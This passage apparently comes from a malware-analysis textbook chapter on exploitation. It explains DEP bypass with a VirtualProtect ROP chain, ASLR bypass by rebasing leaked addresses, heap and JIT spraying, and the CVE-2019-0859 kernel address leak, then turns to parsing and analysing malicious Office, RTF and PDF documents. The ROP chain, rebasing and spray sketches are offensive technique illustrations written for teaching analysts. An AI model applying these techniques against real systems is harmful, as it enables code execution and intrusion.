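
# All addresses below are hypothetical placeholders for illustration only
VIRTUALPROTECT = 0x76A012D0       # API address resolved via a module's IAT
SHELLCODE_ADDR = 0x0019F200       # where the shellcode is expected to live
PAGE_EXECUTE_READWRITE = 0x40

rop_chain = b"".join([
    p32(VIRTUALPROTECT),            # overwritten return address
    p32(SHELLCODE_ADDR),            # return address after VirtualProtect
    p32(SHELLCODE_ADDR),            # lpAddress argument
    p32(0x1000),                    # dwSize argument
    p32(PAGE_EXECUTE_READWRITE),    # flNewProtect argument
    p32(0x0019F000),                # lpflOldProtect (any writable address)
])
```

Once VirtualProtect returns, execution continues at the second packed value, which points to the now-executable shellcode.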
Some ROP chains can execute the required payload without ever needing to return to the shellcode. There are automated tools that help the attacker search for these small code gadgets and construct a valid ROP chain. One of these tools is mona.py, a plugin for the Immunity Debugger.
As you can see, DEP alone doesn’t stop the attackers from executing their shellcode. However, along with address space layout randomization (ASLR), these two mitigation techniques make it hard for the attacker to successfully execute the payload. Let’s take a look at how ASLR works.
ASLR is a mitigation technique that is used by multiple operating systems, including Windows and Linux. The idea behind it is to randomize the addresses where the application and its DLLs are loaded in the process memory. Instead of using predefined ImageBase values as base addresses, the system uses random addresses, making it very hard for attackers to construct their ROP chains, which generally rely on the static addresses of the instructions that comprise them.
Now, let’s take a look at some common ways to bypass it.
For ASLR to be effective, the application and all its libraries must be compiled with ASLR support (for the GCC compiler, this means building position-independent executables with the -pie and -fPIE flags), which isn’t always the case. If there is at least one module that doesn’t support ASLR, it becomes possible for the attacker to find the required ROP gadgets there. This is especially true for tools that have lots of plugins written by third parties or applications that use lots of different libraries. While the base address of kernel32.dll is still randomized (so that the attacker can’t directly return to an API inside it), it can easily be accessed through the import table of the loaded non-ASLR module(s).
In cases where all the libraries support ASLR, writing an exploit is much harder. The known technique for this is chaining multiple vulnerabilities, for example, one responsible for information disclosure and another for memory corruption. The information disclosure vulnerability could leak the address of a module, helping reconstruct the ROP chain based on that address. The exploit could contain a ROP chain composed of just RVAs (relative virtual addresses, without the base address values) and exploit the information disclosure vulnerability on the fly to leak the base address and reconstruct the ROP chain to execute the shellcode. This approach is more common in exploits delivered through scripting languages, for example, vulnerabilities that are exploited using JavaScript. Using the power of such a scripting language, the attacker can construct the ROP chain directly on the target machine.
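The rebasing arithmetic behind this technique is straightforward and can be sketched in a few lines of Python. All the RVAs and the leaked pointer below are made-up values for illustration; in a real exploit, the leaked pointer would come from the information disclosure vulnerability:

```python
# Hypothetical values: the RVA of the function whose address was leaked,
# and the RVAs of the gadgets within the same module
KNOWN_RVA_OF_LEAKED_FUNC = 0x1A2B0
GADGET_RVAS = [0x1021, 0x2F44, 0x5A10]

def rebase_chain(leaked_ptr, leaked_rva, gadget_rvas):
    # The module base is the leaked pointer minus its known RVA;
    # each gadget address is then just base + its RVA
    base = leaked_ptr - leaked_rva
    return [base + rva for rva in gadget_rvas]

chain = rebase_chain(0x7FFA1234A2B0, KNOWN_RVA_OF_LEAKED_FUNC, GADGET_RVAS)
```

This is why an exploit can ship only RVAs: the absolute addresses are computed at runtime, after ASLR has already placed the module.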
An example of this could be the local privilege escalation vulnerability known as CVE-2019-0859 in win32k.sys. The attacker uses a known technique for modern versions of Windows (this works on Windows 7, 8, and 10) called the HMValidateHandle technique. It uses an HMValidateHandle function that’s called by the IsMenu API, which is implemented in user32.dll. Given a handle of a window that has been created, this function returns the address of its memory object in the kernel memory, resulting in an information disclosure that could help in designing the exploit, as shown in the following screenshot:
Figure 8.9 – Kernel memory address leak using the HMValidateHandle technique
This technique works pretty well with stack-based overflow vulnerabilities. But for heap overflows or use-after-free vulnerabilities, a new problem arises: the location of the shellcode in memory is unknown. In stack-based overflows, the shellcode resides in the stack and is pointed to by the esp register, but in heap overflows, it is much harder to predict where the shellcode will be. In this case, another technique called heap spraying is commonly used.
The idea behind this technique is to make multiple addresses lead to the shellcode by filling the application’s memory with lots of copies of it, so that it gets executed with a very high probability. The main problem here is guaranteeing that these addresses point to the start of the shellcode and not to the middle of it. This can be achieved by using some sort of shellcode padding, the most famous example being a huge number of nop bytes (called a nop slide, nop sled, or nop ramp) or any other instructions without major side effects placed before the shellcode:
Figure 8.10 – The heap spray technique
As you can see, the attacker used the 0x0a0a0a0a address to point to the shellcode. Thanks to the heap spraying technique, this address will, with relatively high probability, point to the nop instructions in one of the sprayed blocks, which will eventually lead to the shellcode being executed.
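The probability argument can be modeled with a short Python sketch. The block size and placeholder payload below are arbitrary choices for illustration; the point is that almost every offset inside a sprayed block falls into the nop padding and therefore "slides" into the payload:

```python
# Model one sprayed heap block: a long nop sled followed by the payload
NOP = 0x90
SHELLCODE = b"\xcc" * 32                  # placeholder payload bytes
BLOCK_SIZE = 0x10000                      # one 64 KB spray block (arbitrary)

block = bytes([NOP]) * (BLOCK_SIZE - len(SHELLCODE)) + SHELLCODE

def lands_in_sled(offset):
    # Any offset inside the nop padding slides down into the payload
    return block[offset] == NOP

# Fraction of the block where a random landing point is "safe"
hit_probability = (BLOCK_SIZE - len(SHELLCODE)) / BLOCK_SIZE
```

With these numbers, over 99.9% of the block is padding, which is why a crude address guess is usually good enough for the attacker.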
This technique, known as JIT spraying, is very similar to heap spraying, with the only difference being that the block allocation is caused by abusing a Just-In-Time (JIT) compiler, which also ensures that the produced memory blocks will have EXECUTE permissions, as they are supposed to store generated assembly instructions. This way, DEP can be bypassed together with ASLR.
Several other mitigation techniques have been introduced to protect against exploitation. We will just mention a few of them:
That’s it for the most common mitigations. Now, let’s talk about other types of exploits.
While Microsoft Office is mainly associated with Windows by many people, it has also supported the macOS operating system for several decades. In addition, the file formats used by it are also understood by various other suites, such as Apache OpenOffice and LibreOffice. In this section, we will look at vulnerabilities that can be exploited by malformed documents to perform malicious actions and learn how to analyze them.
The first thing that should be clear when analyzing any exploit is how the files associated with them are structured. Let’s take a look at the most common file formats associated with Microsoft Office that are used by attackers to store and execute malicious code.
This is probably the most well-known file format that can be found in documents associated with various older and newer Microsoft Office products, such as .doc (Microsoft Word), .xls (Microsoft Excel), .ppt (Microsoft PowerPoint), and others. Once completely proprietary, it was later released to the public, and now its specification can be found online. Let’s go through some of the most important parts of it in terms of malware analysis.
The Compound File Binary (CFB) format, also known as OLE2, provides a filesystem-like structure for storing application-specific streams of data in sectors:
Figure 8.11 – OLE2 header parsed
Here is the structure of its header, which is stored at the beginning of the first sector:
Figure 8.12 – DIFAT array mentioning only one FAT sector with an ID of 0x2D
As you can see, it is possible to allocate memory using the usual sectors and mini stream that operates with sectors of smaller sizes:
Figure 8.13 – FAT sector storing information about sector chains
Figure 8.14 – MiniFAT sectors storing information about mini stream chains
As we mentioned previously, for each sector in a chain, the ID of the next sector is stored, up until the last one, which contains the ENDOFCHAIN (0xFFFFFFFE) value. The header takes up a single usual sector, with its values padded according to the sector size if necessary:
Figure 8.15 – Example of the sector chain following the header
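The chain-walking logic described above can be sketched in a few lines of Python. The FAT array here is a toy example invented for illustration; a real parser would read the FAT entries from the file’s FAT sectors:

```python
# Special sector IDs defined by the format
ENDOFCHAIN = 0xFFFFFFFE
FREESECT = 0xFFFFFFFF

def walk_chain(fat, start):
    # Follow the next-sector IDs through the FAT until ENDOFCHAIN is hit
    chain = []
    sector = start
    while sector != ENDOFCHAIN:
        chain.append(sector)
        sector = fat[sector]     # each FAT entry holds the next sector ID
    return chain

# Hypothetical FAT: the chain starting at sector 0 goes 0 -> 3 -> 1,
# while sector 2 is unused (free)
fat = [3, ENDOFCHAIN, FREESECT, 1]
```

Calling walk_chain(fat, 0) reconstructs the full sector chain, which is exactly what a parser does to reassemble a stream scattered across the file.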
There are several other auxiliary storage types, including the following:
Here, stream and storage objects are used in a similar way to files and directories in typical filesystems:
Figure 8.16 – Multiple streams within a single storage object
The root directory will be the first entry in the first sector of the directory chain; it behaves as both a stream and a storage object. It contains a pointer to the first sector that stores the mini stream:
Figure 8.17 – Root directory
In .xls files, the main Workbook stream follows the BIFF8 (Binary Interchange File Format) format. In .doc files, the WordDocument stream should start with the FIB (File Information Block) structure.
Knowing how the files are structured allows reverse engineers to identify anomalies that can lead to unexpected behavior.
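To illustrate how such anomalies can be spotted programmatically, here is a minimal Python sketch that validates a few CFB header fields against the published [MS-CFB] layout (the sample header bytes are synthetic, built just for this example):

```python
import struct

CFB_SIGNATURE = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

def parse_cfb_header(data):
    # Minimal sanity checks: signature, byte order mark, and sector size
    if data[:8] != CFB_SIGNATURE:
        raise ValueError("not a CFB file")
    # Major version (offset 26), byte order (28), sector shift (30)
    major_version, byte_order, sector_shift = struct.unpack_from("<HHH", data, 26)
    if byte_order != 0xFFFE:
        raise ValueError("unexpected byte order mark")
    return {
        "major_version": major_version,
        "sector_size": 1 << sector_shift,   # 512 for v3, 4096 for v4
    }

# Synthetic version 3 header: signature, zeroed CLSID, then the
# minor version, major version, byte order, and sector shift fields
header = CFB_SIGNATURE + b"\x00" * 16 + struct.pack("<HHHH", 0x3E, 3, 0xFFFE, 9)
```

A mismatch in any of these fields (for example, an impossible sector size) is exactly the kind of structural anomaly worth investigating further.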
Now, let’s focus on Rich Text Format (RTF) documents.
RTF is another proprietary Microsoft format with a published specification that can be used to create documents. Its syntax was originally influenced by the TeX language developed mostly by Donald Knuth, as RTF was also intended to be cross-platform. The first reader and writer were released with the Microsoft Word product for Macintosh computers. Unlike the other document formats we’ve described, it is human-readable in usual text editors, with no preprocessing required.
Apart from the actual text, all RTF documents are implemented using the following elements:
Important Note
It is worth mentioning that if the fN part of it is not enforced, the RTF document will be considered valid by MS Office, even if it is absent or replaced with something else.
The embedded executable payloads are commonly stored in the following areas:
Figure 8.18 – Malicious executable stored in the document’s overlay
Apart from that, the remote malicious payload can be accessed using the objautlink control word. In addition, objupdate is commonly used to reload the object without the user’s interaction to achieve code execution.
In terms of obfuscation, multiple techniques exist for this, as follows:
Figure 8.19 – Malware using excessive in control words
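To give an idea of how embedded payloads can be recovered despite such obfuscation, here is a rough Python sketch that collects the hex characters following an \objdata control word and decodes them. The sample document and the decoding regex are simplified illustrations; real-world samples often require a much more forgiving parser:

```python
import binascii
import re

def extract_objdata(rtf_text):
    # Rough sketch: grab everything after \objdata up to the closing brace,
    # then drop nested control words and whitespace used as obfuscation
    match = re.search(r"\\objdata(.*?)\}", rtf_text, re.DOTALL)
    if not match:
        return b""
    hex_chars = re.sub(r"\\[a-z]+-?\d*|[^0-9a-fA-F]", "", match.group(1))
    return binascii.unhexlify(hex_chars)

# Synthetic example; a real document embeds a full OLE-wrapped payload here
sample = r"{\rtf1{\object\objemb{\*\objdata 01050000 02000000}}}"
payload = extract_objdata(sample)
```

The decoded bytes can then be carved out and analyzed as a separate object (for example, an embedded executable or OLE package).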
Now, let’s talk about threats that follow the Office Open XML (OOXML) format.
OOXML format is associated with newer Microsoft Office products and is implemented in files with extensions that end with x, such as .docx, .xlsx, and .pptx. At the time of writing, this is the default format used by modern versions of Office.
In this case, all information is stored in Open Packaging Convention (OPC) packages, which are ZIP archives that follow a particular structure and store XML and other data, as well as the relationships between them.
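Because an OPC package is just a ZIP archive, Python’s standard zipfile module is enough to take a first look inside. The tiny in-memory package below is a synthetic stand-in for a real .docx, which contains many more parts and relationship files:

```python
import io
import zipfile

# Build a tiny synthetic OOXML-like package in memory for illustration
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("[Content_Types].xml", "<Types/>")
    z.writestr("_rels/.rels", "<Relationships/>")
    z.writestr("word/document.xml", "<document/>")

def list_parts(package_bytes):
    # An OPC package is a ZIP archive with a mandated internal structure
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as z:
        return sorted(z.namelist())

parts = list_parts(buf.getvalue())
```

Listing the parts this way is often the quickest first triage step: unexpected binary parts or strange relationship targets stand out immediately.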
Here is its basic structure:
Now that we’ve become familiar with the common document formats, it is time to learn how to analyze malware that utilizes them.
In this section, we are going to learn how malicious Microsoft Office documents can be analyzed. Here, we will focus on malware-exploiting vulnerabilities. Macro threats will be covered in Chapter 10, Scripts and Macros – Reversing, Deobfuscation, and Debugging, as they aren’t classed as exploits from a technical standpoint.
There are quite a few tools that allow analysts to look inside original Microsoft Office formats, as follows:
Regarding the newer Open XML-based files (such as .docx, .xlsx, and .pptx), officedissector, a parser library written in Python that was designed for securely analyzing OOXML files, can be used to automate certain tasks. But overall, once unzipped, they can always be analyzed in your favorite text editor with XML highlighting. Similarly, as we have already mentioned, RTF files don’t necessarily require any specific software and can be analyzed in pretty much any text editor.
When performing static analysis, it generally makes sense to extract macros first if they’re present, as well as check for the presence of other non-exploit-related techniques, such as DDE or PowerPoint actions (their analysis will be covered in Chapter 10, Scripts and Macros – Reversing, Deobfuscation, and Debugging). Then, you need to check whether any URLs or high-entropy blobs are present as they may indicate the presence of shellcode. Only after this does it make sense to dig into anomalies in the document structure that may indicate the presence of an exploit.
Dynamic analysis of these types of exploits can be performed in two stages:
Once we can reliably reproduce the exploit being triggered, we can attach a debugger to the corresponding Microsoft Office process (targeting the vulnerable module) and keep debugging it until we see the payload being triggered. Then, we can intercept this moment and dive deep into how it works.
The Portable Document Format (PDF) was developed by Adobe in the 90s for uniformly presenting documents, regardless of the application software or operating system used. Originally proprietary, it was released as an open standard in 2008. Unfortunately, due to its popularity, multiple attackers misuse it to deliver their malicious payloads. Let’s see how they work and how they can be analyzed.
A PDF is a tree-structured file that consists of objects implementing one of eight data types:
Apart from this, it is possible to use comments with the help of the percent (%) sign.
All complex data objects (such as images or JavaScript entries) are stored using basic data types. In many cases, objects will have the corresponding dictionary mentioning the data type with the actual data stored in a stream.
PDF documents generally start with the %PDF signature, followed by a dash and the format version number (for example, 1.7). However, because PDF documents are parsed starting from the end, this is not guaranteed, and different PDF viewers allow a different number of arbitrary bytes to be placed in front of this signature (in most cases, at least 1,000):
Figure 8.20 – Arbitrary bytes in front of the %PDF signature of a valid document
Multiple keywords can define the boundaries and types of the data objects, as follows:
Figure 8.21 – The xref table in the PDF document
Another less common option is a cross-reference stream, which serves the same purpose.
Figure 8.22 – Example of the object in PDF document
The following are the most common entries that might be of interest to analysts when they’re analyzing malicious PDFs:
Figure 8.23 – The /FlateDecode filter used in a PDF document
It is worth mentioning that in the modern specification, it is possible to replace parts of these names (or even the whole name) with #XX hexadecimal representations. So, /URI can become /#55RI or even /#55#52#49.
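Resolving these escapes is trivial to automate, which is handy when searching a sample for suspicious names such as /URI or /JavaScript. A minimal Python sketch:

```python
import re

def decode_pdf_name(name):
    # Resolve #XX hexadecimal escapes inside a PDF name object,
    # e.g. /#55#52#49 -> /URI
    return re.sub(r"#([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1), 16)),
                  name)
```

Normalizing names this way before scanning prevents simple string searches from being defeated by this obfuscation trick.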
Some entries may reference other objects using the letter R. For example, /Length 15 0 R means that the actual length value is stored in a separate object, 15, in generation 0. When the file is updated, a new object with the incremented generation number is added.
Now, it is time to learn how malicious PDF files can be analyzed. In this section, we will cover various tools that can assist with the analysis and give some guidelines on when and how they should be used.
In many cases, static analysis can answer pretty much any question that an engineer has when analyzing these types of samples. Multiple dedicated open source tools can make this process pretty straightforward. Let’s explore some of the most popular ones:
Figure 8.24 – The PDFStreamDumper tool
Apart from these, multiple tools and libraries can facilitate analysis by parsing a PDF’s structure, decrypting documents, or decoding streams. This includes qpdf, PyPDF2, and origami.
When performing static analysis for malicious PDF files, it usually makes sense to start by listing the actions as well as the different types of objects. Pay particular attention to the suspicious entries we listed previously. Decode all the encoded streams to see what’s inside as they may contain malicious modules.
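As an illustration of the stream-decoding step, here is a rough Python sketch that locates /FlateDecode streams and tries to inflate them with zlib. It deliberately cuts corners (real documents may chain filters or store lengths in separate objects), so a dedicated parser such as qpdf or PyPDF2 is preferable for anything serious; the sample object below is synthetic:

```python
import re
import zlib

def inflate_streams(pdf_bytes):
    # Find /FlateDecode stream bodies and attempt to decompress them
    results = []
    pattern = rb"/FlateDecode.*?stream\r?\n(.*?)endstream"
    for match in re.finditer(pattern, pdf_bytes, re.DOTALL):
        decompressor = zlib.decompressobj()   # tolerates trailing bytes
        try:
            results.append(decompressor.decompress(match.group(1)))
        except zlib.error:
            pass  # corrupted stream or not really deflate data
    return results

# Synthetic object holding a compressed JavaScript-like payload
payload = zlib.compress(b"app.alert('test');")
blob = b"<< /Filter /FlateDecode >>\nstream\n" + payload + b"\nendstream"
```

Running inflate_streams over a suspicious document quickly reveals what the encoded streams actually contain, such as scripts or embedded modules.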
If the JavaScript object has been extracted, follow the recommendations for both static and dynamic analysis that have been provided in Chapter 10, Scripts and Macros – Reversing, Deobfuscation, and Debugging. In many cases, the exploit functionality is implemented using this language. ActionScript is much less common nowadays as Flash Player has been discontinued.
In terms of dynamic analysis, the same steps that were taken for Microsoft Office exploits can be followed:
If the actual exploit body is written in some other language (such as JavaScript), it might be more convenient to debug parts of it separately while emulating the environment that’s required for the exploit to work. This will also be covered in Chapter 10, Scripts and Macros – Reversing, Deobfuscation, and Debugging.
In this chapter, we became familiar with various types of vulnerabilities, the exploits that target them, and different techniques that aim to battle them. Then, we learned about shellcode, how it is different for different platforms, and how it can be analyzed.
Finally, we covered other common types of exploits that are used nowadays in the wild – that is, malicious PDF and Microsoft Office documents – and explained how to examine them. With this knowledge, you can gauge the attacker’s mindset and understand the logic behind various techniques that can be used to compromise the target system.
In Chapter 9, Reversing Bytecode Languages – .NET, Java, and More, we will learn how to handle malware that’s been written using bytecode languages, what challenges the engineer may face during the analysis, and how to deal with them.